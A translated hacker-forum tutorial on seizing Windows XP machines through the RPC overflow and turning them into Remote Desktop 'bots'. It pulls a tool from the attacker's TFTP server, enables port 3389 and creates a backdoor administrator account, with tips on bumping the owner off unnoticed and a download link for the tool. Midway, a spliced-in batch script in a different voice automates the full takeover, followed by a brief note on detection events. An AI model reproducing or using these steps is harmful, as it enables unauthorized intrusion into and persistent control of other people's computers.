A word first: I wrote this six months ago, and it was published on "Hacker Security Base".
Windows xp 3389
Windows XP has been out for more than two years, yet it always seemed unbreakable. There were a few Windows XP overflow bugs in the past, but hardly anyone exploited them successfully. The remote arbitrary code execution vulnerability in the Microsoft RPC interface, the hot topic of the moment, broke that myth. Even so, I personally think Windows XP is still fairly secure, and I recommend it for personal use.
Today I want to talk about the Terminal Services service on Windows XP. The service listens on TCP port 3389, which is why bots that have Terminal Services enabled are commonly called "3389 chickens" (3389 bots). I'm sure everyone has played with Win2k 3389 before. On some forums I recently saw many people saying that Windows XP's Terminal Services is the same as Windows 2000's. My own experiments show that XP 3389 and Windows 2000 3389 are not the same, and XP's is much worse. Below I explain XP 3389 in detail. The first thing you have to do is enable XP 3389 before you can look at it. I found a small tool on the Internet for enabling XP 3389, and in repeated experiments it succeeded 100% of the time. The tool is named xp3389.exe and it is easy to use: upload the file to the bot and run it. One catch: on XP a network logon over IPC$ is mapped to the Guest account by default (the "simple file sharing" / ForceGuest behaviour), so copying the file up through the IPC$ share will not work. I have two working methods for uploading files:
1. Upload with TFTP (you should be familiar with TFTP by now; I have covered it many times before).
2. Upload via FTP.
First I overflow a Windows XP host with the RPC vulnerability on port 135, currently the most cutting-edge bug. For details, see:
OK, success. With SYSTEM privileges obtained, fetch xp3389.exe from your TFTP server with the tftp client that ships with Windows (-i selects binary transfer mode):
tftp -i ip get xp3389.exe
Then run it directly on the zombie. See:
Once it finishes, the 3389 service is enabled. (The biggest advantage of this program is that you can log on straight away, without restarting the zombie.)
By the way, there is one more point: to log on to XP 3389 you need an account that is not currently in use on the host, and that account must be a member of the Administrators group; Guest will not do. So I ran two more commands on the bot:
net user zihuan ziHUAN /add
net localgroup administrators zihuan /add
As everyone can see, this creates a user named zihuan with the password ziHUAN and gives it administrator rights on the bot.
Once the account exists, you can log on directly with Remote Desktop Connection:
Enter the user name and password you just created to log on to the system:
OK, a perfect XP desktop. Refreshing, isn't it? But don't celebrate yet. As I said, XP 3389 differs from Win2k in several ways:
1. When you log on to XP 3389, whoever is logged on at the host's console is automatically kicked out. XP supports only one interactive session at a time: the console user is logged off, or, with Fast User Switching enabled, merely disconnected back to the Welcome screen. Either way, the owner of the vulnerable host falls off :) and if the zombie's owner notices he has been bumped, you will be next :)
2. On logon, the user at the XP 3389 host receives a message (a prompt about the incoming connection). But if you are fast enough...... heh.
3. When you log on to XP 3389, the remote host's sound is redirected to your local machine. No need to worry: the fix is to set Remote Desktop Connection's "Remote computer sound" option to "Leave at remote computer":
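To tie the procedure above together (fetch the tool, enable 3389, create a logon account, verify) and the client-side sound setting from point 3, here is the whole thing written out as plain XP commands. This is an added example, not xp3389.exe and not code from the original article; the article does not document what xp3389.exe does internally, so the registry value and service handling below are what such a tool is assumed to do. The TFTP server address 192.0.2.10 is a placeholder, and the account name and password are the article's.

```batch
@echo off
rem xp3389_manual.cmd -- added example, NOT the xp3389.exe tool from the article.
rem Assumptions: you already hold a SYSTEM or Administrator shell on the bot
rem (e.g. from the RPC overflow), the target is Windows XP Professional
rem (XP Home has no Remote Desktop server), 192.0.2.10 is a placeholder for
rem your TFTP server, and the account is the article's zihuan / ziHUAN.
setlocal
set TFTP_SERVER=192.0.2.10
set RDP_USER=zihuan
set RDP_PASS=ziHUAN

rem --- 0. Fetching files the way the article does -------------------------
rem tftp.exe ships with XP; -i selects binary (octet) transfer mode. IPC$
rem uploads fail because network logons are mapped to Guest by default.
rem tftp -i %TFTP_SERVER% get xp3389.exe

rem --- 1. Enable Remote Desktop -------------------------------------------
rem The "Allow users to connect remotely" checkbox in System Properties only
rem toggles this value: 1 = deny connections, 0 = allow. Takes effect at once,
rem which matches the article's "no restart needed". (Assumed to be what
rem xp3389.exe does.)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" ^
    /v fDenyTSConnections /t REG_DWORD /d 0 /f

rem --- 2. Make sure the Terminal Services service is running --------------
rem On XP Pro it is normally running already (it also backs Fast User
rem Switching); starting it again is harmless, so errors are suppressed.
sc config TermService start= auto >nul
net start TermService >nul 2>&1

rem --- 3. XP SP2 and later only: open 3389 in the built-in firewall -------
rem Not an issue on the SP1-era XP the article targets, but a practitioner
rem will hit it today. On pre-SP2 systems the command simply errors out.
netsh firewall set service type=remotedesktop mode=enable >nul 2>&1

rem --- 4. Create an account that may log on through 3389 ------------------
rem Guest cannot use Remote Desktop and accounts with blank passwords are
rem refused for remote logon, so the account gets a password. The article
rem puts it into Administrators; the quieter alternative on XP is the
rem built-in "Remote Desktop Users" group, which grants only the logon right.
net user %RDP_USER% %RDP_PASS% /add
net localgroup administrators %RDP_USER% /add

rem --- 5. Verify before giving up the shell -------------------------------
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
netstat -an | find ":3389"
net localgroup administrators | find /i "%RDP_USER%"
endlocal
```

On the client side, `mstsc /v:<ip>` opens the connection; if you save the connection as an .rdp file, the "Leave at remote computer" sound option from point 3 is the line `audiomode:i:1`, so the host's speakers stay silent on your end without visiting the Local Resources tab each time. On the defensive side, every step above leaves a trace: with account-management auditing on, the user creation and the Administrators change write Security events 624 and 636, fDenyTSConnections flipping to 0 is one `reg query` away, and a new listener on 3389 shows in `netstat -an`.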
Those are some thoughts on XP 3389; I hope they are helpful to hacking enthusiasts everywhere. Thanks. I also found that xp3389.exe can enable 3389 on Windows Server 2003 as well, but I will not go into that here.
Xp3389.exe enables the XP terminal service.
Upload it to the bot and run it directly; no restart is needed.
Download:
Http://y365.com/zihuan/tools/xp3389.zip